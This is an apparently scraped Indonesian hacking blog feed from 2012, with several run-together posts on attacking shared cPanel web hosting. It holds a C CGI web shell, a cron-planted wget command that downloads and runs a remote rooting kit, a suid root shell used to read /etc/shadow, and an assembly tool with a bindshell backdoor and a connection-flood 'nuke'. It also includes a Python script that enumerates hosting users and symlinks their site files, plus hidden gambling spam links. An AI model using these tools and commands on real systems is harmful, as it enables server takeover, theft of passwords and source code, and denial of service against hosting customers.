system(perintah);<br /><br />return 0;<br />}<br />=======================<br /><br />compile: gcc -o cgi cgi.c<br /><br />untuk rooting bisa menggunakan botnet (yang belum jadi dibuat sih)<br /><br />==============<br /><br />utk rooting, misal di cron tadi kita isikan perintah:<br />============================<br />wget http://testsite.swcteam.com/libraries/rooting.tgz;tar zxvf rooting.tgz;cd rooting;perl backup.pl<br />============================<br /><br />jika berhasil melakukan root maka dalam beberapa menit kemudian file suid di direktori backups menjadi suid root<br />====<br />ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ls -l suid<br />-rwsr-xr-x 1 root ev1lut10n 7292 2012-02-16 05:39 suid<br />=====<br /><br />di mana kita bisa mengeksekusi perintah root:<br />misal:<br />====<br />ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ./suid id<br />uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout)<br />===<br /><br />utk perintah dg lebih dari 1 argumen:<br />=======<br />echo 'cat /etc/shadow'> cmd;./suid ./cmd<br />======<br /><br /><br />dengan teknik di atas attacker bisa menjalankan perintah pada web hosting dengan cpanel envir0nment seperti idwebhost<br /><br /><br />"tentu saja inti dari serangan ini bukanlah DDOS tapi penggunaan exploit local dan bagaimana ide untuk mendapatkan sebanyak mungkin<br />pintu agar bisa mengontrol server selama mungkin"<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4427476477368696600?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-80775352923505374422012-02-19T01:39:00.001-08:002012-02-19T01:39:43.988-08:00jasa pembuatan website<title>jasa pembuatan website</title><br /><a href="http://jasaplus.com/jasapembuatansoftware/" title="jasa pembuatan web">http://jasaplus.com/jasapembuatansoftware/</a><br /><br /><a href="http://jasaplus.com/jasapembuatansoftware" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://www.jasaplus.com/jasainstalasijaringan" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://www.jasaplus.com/jasapembuatanwebsite" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://www.jasaplus.com/jasapembuatanweb" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://www.jasaplus.com/jasa_pembuatan_web" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://www.jasaplus.com/jasa_pembuatan_website" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://jasaplus.com/jasapembuatansoftware" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://jasaplus.com/jasawebdesign" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://jasaplus.com/jasadesignweb" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://jasaplus.com/webdesign" title="jasa pembuatan web">jasa pembuatan web</a><br /><a href="http://jasaplus.com/webdesignindonesia" title="jasa pembuatan website">jasa pembuatan website</a><br /><br /><a href="http://freelancewebdesign.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasa_pembuatan_web.jasaplus.com">jasa pembuatan web</a> <br /><a href="http://jasa_pembuatan_website.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasadesignweb.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasapembuatanweb.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasapembuatanwebsite.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasapembuatanwebsiteindonesia.jasaplus.com">jasa pembuatan web</a><br /><a href="http://jasawebdesign.jasaplus.com">jasa pembuatan web</a> <br /><a href="http://jasawebsitedesign.jasaplus.com">jasa pembuatan web</a><br /><a href="http://pembuatanweb.jasaplus.com">jasa pembuatan web</a><br /><a href="http://pembuatanwebsite.jasaplus.com">jasa pembuatan web</a><br /><a href="http://webdesign.jasaplus.com">jasa pembuatan web</a><br /><a href="http://webdesigncompany.jasaplus.com">jasa pembuatan web</a><br /><a href="http://webmaster.jasaplus.com">jasa pembuatan web</a> <br /><a href="http://webmasterberpengalaman.jasaplus.com">jasa pembuatan web</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8077535292350537442?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-21608421659379474532012-02-18T04:57:00.001-08:002012-02-18T09:37:18.426-08:00ev1lut10n.asm - a simple game for linux 32 bit;ev1lut10n Linux Utility for 32 bit linux <br />;programmer : ev1lut10n <br />;int-sec t00l pre-release<br />;thanks to: petimati,cakill,danzel,p4,x-hack,flyff666, motaro irhaby, fadli and all ;my bro<br />;nasm -f elf -g -F stabs ev1lut10n.asm -o ev1lut10n.o<br />;gcc -o ev1lut10n ev1lut10n.o<br />;website: http://www.jasaplus.com<br />;gopher: gopher://sdf.org/1/users/wisdomc0<br />;gopher: gopher://sdf.org/1/users/ev1lut10<br /><br />global main<br />%define PF_INET 2<br />%define AF_INET PF_INET<br />%define SOCK_STREAM 1<br />%define INADDR_ANY 0<br />%define PORT 80<br />extern printf<br />extern scanf<br />extern socket<br />extern connect<br />extern htons<br />extern recv<br />extern send<br />extern close<br />extern inet_aton<br /><br />section .bss<br />pilih_on_heap resb 256 ; beware my heap overflow <br />targetx: resw 50 ; beware my heap overflow <br /><br /><br />section .data<br />data db ".::ev1lut10n Linux Utility for linux x86 version 1.0::.",13,10<br />pjg_data equ $-data<br />c0d3r db "programmer : ev1lut10n",13,10<br />pjg_c0d3r equ $-c0d3r<br /><br />;main menu<br />menu1 db "proc - show process",13,10<br />pjg_menu1 equ $-menu1<br /><br />menu2 db "bind - bindshell backdoor on port 12345",13,10<br />pjg_menu2 equ $-menu2<br /><br />menu3 db "nuke - nuk3 a target",13,10<br />pjg_menu3 equ $-menu3<br /><br />;eof main menu<br /><br />c0ns0l3 db "cmd:"<br />pjg_c0ns0l3 equ $-c0ns0l3<br />signed db "selected option:",13,10<br />pjg_signed equ $-signed<br />pilih db "%s", 0<br /><br />;defining datas for gs.asm nuk3r<br />akhir db "-------------finished----------",13,10 <br />pjg_akhir equ $ - akhir<br />banner db ".::gantung socket::.",13,10 <br />pjg_banner equ $ - banner<br />tunggu db "..Boom..",13,10 <br />pjg_tunggu equ $ - tunggu<br /><br />programmer db "...:::programmer: ev1lut10n:::... ",13,10 <br />pjg_programmer equ $ - programmer<br />fok db "-------------------------------------",13,10 <br />pjg_fok equ $ - fok<br />kon_gagal db "[-] wtf dude ? failed at connect() ",13,10 <br />warning db "warning !!! do not use hostname !!! use target ip address instead !!!",13,10 <br />pjg_warning equ $ - warning<br /><br />ask_target db "enter target ip address : ",0<br />target db "%s", 0<br />ask_loop db "enter target ip address : ",0<br /><br />fd dd 0 <br />struc sockaddr_in<br /> .sin_family resw 1 <br /> .sin_port resw 1 <br /> .sin_addr resd 1 <br /> resb 8 <br />endstruc<br />struktur istruc sockaddr_in <br />;eof gs.asm nuk3r <br /><br />section .text<br />main:<br />jmp _ev1lut10n<br /><br />_procedure_writeln:<br /> push ebp <br /> mov ebp,esp<br /> mov ebx,0x1<br /> mov eax,0x4<br /> int 80h<br /> ;mov ah,09h<br /> ;mov dx,offset str1ng<br /> ;int 21h<br /> mov esp,ebp <br /> pop ebp<br /> ret<br /><br />_procedure_tampilan_proses:<br /> push ebp <br /> mov ebp,esp<br /><br /> xor eax,eax <br /> xor ecx,ecx <br /> xor edx,edx<br /><br /> push eax <br /> push 0x73702f2f <br /> push 0x6e69622f <br /> mov ebx, esp <br /> mov eax, 11<br /> int 80h<br /> <br /> mov esp,ebp <br /> pop ebp<br /> ret<br /><br />;start socket operation without c library<br />__________ev1lut10n____________________bind12345:<br />push ebp <br />mov ebp,esp<br /><br /> push byte 2<br /> pop eax<br /> int 80h<br /><br />mov esp,ebp <br />pop ebp<br /><br />__________ev1lut10n____________________soket:<br />push ebp <br />mov ebp,esp<br /><br />push byte 0x0 <br />push byte 0x1 <br />push byte 0x2 <br /><br />mov eax, 102<br />mov ebx, 0x1<br />mov ecx,esp <br />int 80h<br /><br />mov edx, eax<br /><br />mov esp,ebp <br />pop ebp<br /><br />_________ev1lut10n_____________________binder:<br />push ebp <br />mov ebp,esp<br /><br />push byte 0<br />push byte 0<br />push byte 0<br />push word 0x3930<br />push word 2<br />mov ebx, esp<br /><br />push byte 16<br />push ebx<br />push edx<br /><br />mov eax,102 <br />mov ebx,2<br />mov ecx,esp<br />int 80h<br /><br />mov esp,ebp <br />pop ebp<br /><br />___________ev1lut10n___________________lisen:<br />push ebp <br />mov ebp,esp<br /><br />push byte 0x1<br />push edx<br />mov eax,102<br />mov ebx,4<br />mov ecx,esp<br />int 80h<br /><br />mov esp,ebp <br />pop ebp<br /><br />__________ev1lut10n____________________acep:<br />push ebp <br />mov ebp,esp<br /><br />push byte 0<br />push byte 0<br />push edx<br />mov eax,102<br />mov ebx,5<br />mov ecx,esp<br />int 80h<br /><br />mov edx, eax<br /><br />mov esp,ebp <br />pop ebp<br /><br />___________ev1lut10n___________________siap_fd:<br />push ebp <br />mov ebp,esp<br /><br />mov eax,63<br />mov ebx,edx<br />mov ebx,2<br />int 80h<br /><br />mov eax,63<br />mov ebx,edx<br />mov ecx,1<br />int 80h<br /><br />mov eax,63<br />mov ebx,edx<br />mov ecx,0<br />int 80h<br /><br />mov esp,ebp <br />pop ebp<br /><br />___________ev1lut10n___________________eksekusi:<br /> push ebp <br /> mov ebp,esp<br /><br />push BYTE 11<br />pop eax<br />push ecx<br />push 0x68732f2f<br />push 0x6e69622f<br />mov ebx, esp<br />push ecx<br />mov edx, esp<br />push ebx<br />mov ecx, esp<br />int 80h<br /><br />mov esp,ebp <br />pop ebp<br /><br />bersih2:<br /> push ebp <br /> mov ebp,esp<br /><br />push byte 0x06<br />pop eax<br />int 80h<br />jmp keluar<br /><br />mov esp,ebp <br />pop ebp<br />;eof socket operation without c library<br /><br />;start stack op<br />pr3p4r3_gs_asm:<br /> push ebp <br /> mov ebp,esp<br /> mov eax,10000<br /> mov edx,pjg_fok<br /> mov ecx,fok<br /> call (_procedure_writeln)<br /> <br /> <br /> mov edx,pjg_banner<br /> mov ecx,banner<br /> call (_procedure_writeln)<br /> <br /> mov edx,pjg_programmer<br /> mov ecx,programmer<br /> call (_procedure_writeln)<br /> <br /> mov edx,pjg_fok<br /> mov ecx,fok<br /> call (_procedure_writeln)<br /> <br /> push dword ask_target<br /> call printf<br /> push dword targetx<br /> push dword target<br /> call scanf<br /><br /> <br /><br />while:<br /> cmp eax,0<br /> je finish<br /> push dword 0<br /> push dword SOCK_STREAM<br /> push dword AF_INET<br /> call socket <br /> mov [fd], eax <br /> mov word [struktur+sockaddr_in.sin_family], AF_INET<br /> push dword (struktur + sockaddr_in.sin_addr)<br /> push dword targetx<br /> call inet_aton <br /> push word PORT<br /> call htons <br /> mov word [struktur+sockaddr_in.sin_port], ax<br /> push dword sockaddr_in_size<br /> push dword struktur<br /> push dword [fd]<br /> call connect<br /> mov edx,pjg_tunggu<br /> mov ecx,tunggu<br /> call (_procedure_writeln)<br /> <br /> inc eax <br /> jmp while <br />finish:<br /> mov edx,pjg_akhir<br /> mov ecx,akhir<br /> call (_procedure_writeln)<br /> <br /> mov esp,ebp <br /> pop ebp<br /> ret<br /><br /><br /><br /><br /><br />_ev1lut10n:<br /> push ebp <br /> mov ebp,esp<br /><br /> mov edx,pjg_data<br /> mov ecx,data<br /> call (_procedure_writeln)<br /><br /> mov edx,pjg_c0d3r<br /> mov ecx,c0d3r<br /> call (_procedure_writeln)<br /> <br /> <br /> mov edx,pjg_menu1<br /> mov ecx,menu1<br /> call (_procedure_writeln)<br /><br /> mov edx,pjg_menu2<br /> mov ecx,menu2<br /> call (_procedure_writeln)<br /><br /> mov edx,pjg_menu3<br /> mov ecx,menu3<br /> call (_procedure_writeln)<br /><br /> mov edx,pjg_c0ns0l3<br /> mov ecx,c0ns0l3<br /> call (_procedure_writeln)<br />;(gdb) x/s 0x8049268<br />;0x8049268 <pilih_on_heap>: <br /> mov eax,3 <br /> mov ebx,0 <br /> mov ecx,pilih_on_heap <br /> int 80h<br /> push eax<br /> mov eax,4<br /> mov ebx,1<br /> mov ecx,signed <br /> mov edx,pjg_signed<br /> int 80h<br /><br /> mov eax,4 <br /> mov ebx,1 <br /> mov ecx,pilih_on_heap<br /> pop edx<br /> int 80h<br /> xor eax,eax<br /> mov eax, dword [pilih_on_heap] <br />cmp eax,'proc'<br />je _procedure_tampilan_proses<br />cmp eax,'nuke'<br />je pr3p4r3_gs_asm<br />cmp eax,'bind'<br />je __________ev1lut10n____________________bind12345<br /><br />jmp short keluar<br /> mov esp,ebp <br /> pop ebp<br /><br />keluar:<br />nop <br />mov eax,0x01<br />int 80h<br />nop <br /><br /><br /><div name="ev1lut10n_1s_m4f14_dont_play_with_me_one_day_you_die" style="background-color: black;"><a href="http://www.ffbmania.com/" title="agen bola sbobet"><span style="color: black;">http://ffbmania.com</span></a><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola sbobet"><span style="color: black;">http://ourbetting.com</span></a><br /><br /><a href="http://www.royalbet77.com/" title="agen bola sbobet"><span style="color: black;">http://royalbet77.com</span></a><br /><br /><a href="http://www.zonabets.com/" title="agen bola sbobet"><span style="color: black;">http://zonabets.com</span></a><br /><a href="http://www.ffbmania.com/" title="agen bola sbobet"><span style="color: black;">http://ffbmania.com</span></a><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola sbobet"><span style="color: black;">http://ourbetting.com</span></a><br /><br /><a href="http://www.royalbet77.com/" title="agen bola sbobet"><span style="color: black;">http://royalbet77.com</span></a><br /><br /><a href="http://www.zonabets.com/" title="agen bola sbobet"><span style="color: black;">http://zonabets.com</span></a><br /><a href="http://www.ffbmania.com/" title="agen bola sbobet"><span style="color: black;">http://ffbmania.com</span></a><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola sbobet"><span style="color: black;">http://ourbetting.com</span></a><br /><br /><a href="http://zonehmirrors.net/defaced/2012/01/15/wheelsmotorcycles.co.uk/css/taruhan_bola.html" title="agen bola"><span style="color: black;">http://zonehmirrors.net/defaced/2012/01/15/wheelsmotorcycles.co.uk/css/taruhan_bola.html</span></a><br /><br /><a href="http://www.pasangbet.com/" title="agen bola sbobet"><span style="color: black;">http://pasangbet.com</span></a><br /><br /><a href="http://www.ffbmania.com/" title="agen bola sbobet"><span style="color: black;">http://ffbmania.com</span></a><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola sbobet"><span style="color: black;">http://ourbetting.com</span></a><br /><br /><a href="http://www.royalbet77.com/" title="agen bola sbobet"><span style="color: black;">http://royalbet77.com</span></a><br /><br /><a href="http://www.zonabets.com/" title="agen bola sbobet"><span style="color: black;">http://zonabets.com</span></a><br /><br /><br /><a href="http://ferrymulyanaditangkap.blogspot.com/" title="agen bola ibcbet"><span style="color: black;">http://ferrymulyanaditangkap.blogspot.com/</span></a><br /><br /><br /><br /><a href="http://agen-bola77.blogspot.com/" title="agen bola ibcbet"><span style="color: black;">http://agen-bola77.blogspot.com/</span></a><br /><br /><br /><br /><a href="http://royalbet77.blogspot.com/" title="agen bola ibcbet"><span style="color: black;">http://royalbet77.blogspot.com/</span></a><br /><h1>agenbolasbobet</h1><br /><br /><br /><br /><br /><br /><a href="http://www.pasangtaruhan.com/" title="agen bola euro 2012"><span style="color: black;">http://pasangtaruhan.com</span></a><span style="color: black;"><br /><a href="http://www.bursagen.com/" title="agen bola euro 2012"><span style="color: black;">http://bursagen.com</span></a><span style="color: black;"><br /><br /><a href="http://www.ffbmania.com/" title="agen bola euro 2012"><span style="color: black;">http://ffbmania.com</span></a><span style="color: black;"><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola euro 2012"><span style="color: black;">http://ourbetting.com</span></a><span style="color: black;"><br /><br /><a href="http://www.royalbet77.com/" title="agen bola euro 2012"><span style="color: black;">http://royalbet77.com</span></a><span style="color: black;"><br /><br /><a href="http://www.zonabets.com/" title="agen bola euro 2012"><span style="color: black;">http://zonabets.com</span></a><span style="color: black;"><br /><br /><br /><a href="http://ferrymulyanaditangkap.blogspot.com/" title="agen bola euro 2012"><span style="color: black;">http://ferrymulyanaditangkap.blogspot.com/</span></a><span style="color: black;"><br /><br /><br /><br /><a href="http://agen-bola77.blogspot.com/" title="agen bola euro 2012"><span style="color: black;">http://agen-bola77.blogspot.com/</span></a><br /><br /><br /><br /><a href="http://royalbet77.blogspot.com/" title="agen bola euro 2012"><span style="color: black;">http://royalbet77.blogspot.com/</span></a><br /><br /><br /><br /><br /><br /><br /><br /><a href="http://www.pasangtaruhan.com/" title="agen bola euro2012"><span style="color: black;">http://pasangtaruhan.com</span></a><br /><a href="http://www.bursagen.com/" title="agen bola euro2012"><span style="color: black;">http://bursagen.com</span></a><br /><br /><a href="http://www.ffbmania.com/" title="agen bola euro2012"><span style="color: black;">http://ffbmania.com</span></a><br /><br /><br /><a href="http://www.ourbetting.com/" title="agen bola euro2012"><span style="color: black;">http://ourbetting.com</span></a><br /><br /><a href="http://www.royalbet77.com/" title="agen bola euro2012"><span style="color: black;">http://royalbet77.com</span></a><br /><br /><a href="http://www.zonabets.com/" title="agen bola euro2012"><span style="color: black;">http://zonabets.com</span></a><br /></span></span></span></span></span></span></span><br /><h1><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;">agenbolasbobet</span></span></span></span></span></span></span></h1><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><br /><br /></span></span></span></span></span></span></span></div><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><span style="color: black;"><br /><br /><br /><span style="color: white;"><br /><span style="color: white;"></span></span></span></span></span></span></span></span></span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-2160842165937947453?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-82772665468889738122012-02-16T14:34:00.000-08:002012-02-16T14:34:59.776-08:002012 botnet development continue<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-SX4tabu1G0k/Tz2EVvx5sGI/AAAAAAAAA5o/HbVX9nn-OYI/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-SX4tabu1G0k/Tz2EVvx5sGI/AAAAAAAAA5o/HbVX9nn-OYI/s1600/botnet.jpg" width="700" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8277266546888973812?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-5697571392153886212012-02-16T14:31:00.000-08:002012-02-16T14:31:04.351-08:00some valentine guitar creation by ev1lut10n<embed height="266" src="http://www.youtube.com/v/INuXuJoGjTg&fs=1&source=uds" type="application/x-shockwave-flash" width="320"></embed><br /><br />my valentine in guitar<br /><embed height="266" src="http://www.youtube.com/v/47alCduyq2c&fs=1&source=uds" type="application/x-shockwave-flash" width="320"></embed><br /><br /><br />close to you in guitar<br /><br /><embed height="266" src="http://www.youtube.com/v/ztrM2OosQVo&fs=1&source=uds" type="application/x-shockwave-flash" width="320"></embed><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-569757139215388621?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-44794866097768396902012-02-16T11:33:00.000-08:002012-02-16T13:59:27.380-08:00seekuser.pythis is blogspot you gotta repair the indent by yourself<br /><pre>#!/usr/bin/python <br />#seek user for a domain and auto symlink index.php inside cpanel hosting environment<br />#c0d3r: ev1lut10n<br />#thanks to: x-hack.danzel,flyff666,petimati,ketek,romeo,tabun<br />#this will works on path of users: /home/username/public_html<br />#and all devilzc0de members<br />#special thanks: merikenin for giving me inspiration<br />#blog: http://myw1sd0m.blogspot.com<br />#site : http://jasaplus.com<br />#site : http://flightinformationdisplay.com<br />#gopher: gopher://sdf.org/1/users/wisdomc0<br />#gopher: gopher://sdf.org/1/users/ev1lut10<br />import os<br />import urllib<br />import httplib<br />import string<br />import sys<br />import random<br />import time<br />domain_target="hackers.com"<br />passwd_file="passwd.txt"<br />salah="Invalid"<br />user=""<br />if len(sys.argv) <=1:<br /> print "Usage: ./seekuser.py passwd_file targetdomain.com"<br /> print "Ex: ./seekuser.py /etc/passwd hackers.com"<br /> sys.exit(1)<br />else:<br /> passwd_file = sys.argv[1] <br /> domain_target=sys.argv[2]<br />try:<br /> fd = open(passwd_file)<br />except:<br /> print "Sorry failed to open "+passwd_file<br /> sys.exit(1)<br />content = fd.readline()<br />while (content != ""):<br /> content.replace( "\n", "" )<br /> content = fd.readline()<br /> content=content.strip()<br /> arkon=content.split(':')<br /> user=arkon[0]<br /> if user != "" :<br /> print "testing "+user+" on:"+ domain_target<br /> url="http://"+domain_target+"/cgi-sys/guestbook.cgi?user="+user<br /> response=urllib.urlopen(url)<br /> res = response.read()<br /> if salah not in res:<br /> <br /> print "[+] W00t found : " + user + " for domain : "+domain_target <br /> os.system ("echo "+user+" > username_of_"+domain_target)<br /> print "creating symlink for /home/"+user+"/public_html/index.php" <br /> print "on success you can read the source code on: index_of_"+domain_target+".txt"<br /> os.system("ln -s /home/"+user+"/public_html/index.php index_of_"+domain_target+".txt")<br /> fd.close<br /> sys.exit(1)<br /><br /></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-4479486609776839690?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-67200705678501013592012-02-15T15:42:00.000-08:002012-02-15T16:58:44.312-08:00bypass disable php function, disable cgi python, cgi perlbypass disable function, disable cgi python, cgi perl di target dg cgi bin<br /><br />by: ev1lut10n<br /><br />yup kali ini akan kita mainkan salah satu dari permainan rahasia yang paling mudah (teknik ini hanya utk pemula yg baru belajar membypass)<br />yang biasa dipakai attacker dalam membypass (masih banyak teknik2 lainya yg bisa dipakai si attacker untuk membypass).<br /><br />misal pada target terdapat disable function php berikut ini:<br />disable_functions: ini_alter,system,passthru,shell_exec,leak,listen,chgrp,apache_setenv,define_syslog_variables,openlog,syslog,ftp_exec,posix_getpwuid,posix_getpwnam<br /><br />lalu kita mencoba mengupload shell cgi perl maupun python ke cgi-bin tapi sayangnya setelah diupload crut:<br />===<br />Internal Server Error<br /><br />The server encountered an internal error or misconfiguration and was unable to complete your request.<br /><br />Please contact the server administrator, webmaster@adhdsociety.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.<br /><br />More information about this error may be available in the server error log.<br /><br />Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.<br />=====<br /><br />karena masalah path atau krn perl atau python pantang kita exec (permission denied bo)<br /><br />untuk mengatasi permasalahan di atas bisa dg mencolong satu cpanel di server itu lalu setelah masuk ke cpanel<br />liat di bag biasanya ada cron, dari situ kita bisa pakai untuk menjalankan perintah shell:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2-4aWA5wnmA/TzxBXFFxyYI/AAAAAAAAA5I/jMGrjsMGCBw/s1600/kue.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2-4aWA5wnmA/TzxBXFFxyYI/AAAAAAAAA5I/jMGrjsMGCBw/s1600/kue.jpg" /></a></div><br /><br />selanjutnya bikin cron baru, pilih common setting, pilih every minute:<br /><br />misal perintahnya: id > id.txt<br /><br />selanjutnya jika berhasil maka kita bisa melihat hasil jalanya perintah di file id.txt tadi yang akan tersimpan di /home/usercpanelyangkitaboboltadi<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-87QUIrOy9k8/TzxBv8kt3DI/AAAAAAAAA5Q/JH0Xdv8Y5-Q/s1600/kue2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="http://2.bp.blogspot.com/-87QUIrOy9k8/TzxBv8kt3DI/AAAAAAAAA5Q/JH0Xdv8Y5-Q/s320/kue2.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div><br /><br />misal kita liat hasil pocnya seperti di bawah ini:<br /><br /><a href="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-RFJk8KEq8_8/TzxCoBrff7I/AAAAAAAAA5g/JqznrcMgNKM/s1600/kue3.jpg" /></a><br /><br />nah karena teknik di atas akan berjalan sangat lama krn harus menunggu cron permenit kita akan gali lagi lebih dalam.<br />banyak teknik yang bisa dipakai. misal dg cgi shell dari c :<br /><br />=====<br />/**<br />CGI Shell in C<br />made by : ev1lut10n<br />**/<br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br /><br />static void kotak_cmd()<br />{<br />printf("%s","<br><form action=?");<br />printf("%s","method=get>"); <br />printf("%s","shell command : <input type=text"); <br />printf("%s"," name=cmd>"); <br />printf("%s","<input type=submit"); <br />printf("%s"," value=execute>");<br />printf("%s","</form>");<br />}<br />static void set_heder()<br />{<br /> printf("%s%c%c\n","Content-Type:text/html;charset=iso-8859-1",13,10);<br />}<br /><br /><br />char *replace(char *st, char *orig, char *repl) {<br /> static char buffer[4096];<br /> char *ch;<br /> if (!(ch = strstr(st, orig)))<br /> return st;<br /> strncpy(buffer, st, ch-st); <br /> buffer[ch-st] = 0;<br /> sprintf(buffer+(ch-st), "%s%s", repl, ch+strlen(orig));<br /> return buffer;<br /> }<br /> <br />int main(void)<br />{<br />char *data;<br />char cmd[100];<br />char perintah[256]=""; <br />set_heder();<br />kotak_cmd(); <br />data = getenv("QUERY_STRING");<br />sscanf(data,"cmd=%s",cmd);<br />printf("\ncmd: |%s|\n",cmd); <br />strcat(perintah,cmd);<br /> printf("\nperintah: |%s|\n",perintah); <br /> system(perintah);<br /><br />return 0;<br />}<br />=======================<br /><br />compile: gcc -o cgi cgi.c<br /><br />untuk rooting bisa menggunakan botnet (yang belum jadi dibuat sih)<br /><br />==============<br /><br />utk rooting, misal di cron tadi kita isikan perintah:<br />============================<br />wget http://testsite.swcteam.com/libraries/rooting.tgz;tar zxvf rooting.tgz;cd rooting;perl backup.pl<br />============================<br /><br />jika berhasil melakukan root maka dalam beberapa menit kemudian file suid di direktori backups menjadi suid root<br />====<br />ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ls -l suid<br />-rwsr-xr-x 1 root ev1lut10n 7292 2012-02-16 05:39 suid<br />=====<br /><br />di mana kita bisa mengeksekusi perintah root:<br />misal:<br />====<br />ev1lut10n@ev1lut10n-Vostro1310:~/www/backups$ ./suid id<br />uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout)<br />===<br /><br />utk perintah dg lebih dari 1 argumen:<br />=======<br />echo 'cat /etc/shadow'> cmd;./suid ./cmd<br />======<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6720070567850101359?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-55138318673172721672012-02-13T09:37:00.001-08:002012-02-13T10:10:36.236-08:00modifikasi WP bit pada register cr0 di mesin x86modifikasi WP bit pada register cr0 di mesin x86<br />by: ev1lut10n<br /><br />"there's a sleeping monster when he got his old skills he's a real monster"<br /><br />Setelah sekian lama bermasalah akhirnya baru bisa online hari ini. oleh karena itu akan kita mulai kembali permainan kita<br />yang tertunda tentang wp bit pada register cr0.<br /><br />cr0 merupakan register kontrol pada x86. WP bit pada cr0 akan menentukan apakah kita bisa melakukan write pada pages<br />yang bertanda read only atau tidak, untuk bisa melakukan write kita harus mengeset wp bit pada cr0. <br /><br />Untuk mengetahui wp bit pada register cr0 bisa menggunakan read_cr0 di sini kita bisa melihat penggunaan PVOP_CALL0 pada read_cr0<br />/usr/include/asm/paravirt.h:<br />==========<br />static inline unsigned long read_cr0(void)<br />{<br /> return PVOP_CALL0(unsigned long, pv_cpu_ops.read_cr0);<br />}<br />=========<br /><br />sedangkan untuk mengeset bit cr0 menjadi unprotected bisa dengan write_cr0<br />=============<br />static inline void write_cr0(unsigned long x)<br />{<br /> PVOP_VCALL1(pv_cpu_ops.write_cr0, x);<br />}<br />================<br /><br />berikut ini contoh penggunaan read_cr0<br /><br />read_cr0.c<br />===================<br />/**read_cr0 test by ev1lut10n**/<br />#include <linux/module.h><br />#include <linux/kernel.h><br />#include <linux/version.h><br />#include <linux/errno.h><br />#include <linux/mm.h><br />#include <asm/unistd.h><br />int readcr0test()<br />{<br /> unsigned long cr0;<br /> cr0 = read_cr0(); <br /> printk("\n%lu",cr0);<br /> return 0;<br />}<br /><br />int init_module (void)<br />{<br />readcr0test();<br />return 0;<br />}<br /><br /><br />void cleanup_module (void)<br />{<br />return 0;<br />}<br />================================<br /><br />Makefile<br />=======<br />obj-m += read_cr0.o<br /><br />all:<br /> make -C /lib/modules/$(shell uname -r)/build M=$(PWD) 